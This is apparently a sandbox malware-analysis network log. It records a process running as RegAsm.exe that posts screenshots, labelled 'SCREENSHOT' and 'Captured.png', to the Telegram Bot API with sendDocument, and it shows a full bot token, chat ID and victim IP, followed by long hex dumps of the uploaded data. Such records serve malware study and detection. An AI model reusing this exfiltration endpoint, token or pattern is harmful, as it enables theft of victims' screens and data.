                                                                            2025-01-09 10:38:40 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:41 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:41 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1832
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.449770149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:42 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd32589c75e68a
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:42 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 35 38 39 63 37 35 65 36 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd32589c75e68aContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:42 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:42 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:42 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:42 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:42 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:42 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:38:42 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:42 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:42 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:43 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:43 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.449772149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:44 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd327a79df105c
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:44 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 37 61 37 39 64 66 31 30 35 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd327a79df105cContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:44 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:44 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:44 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:44 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:44 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
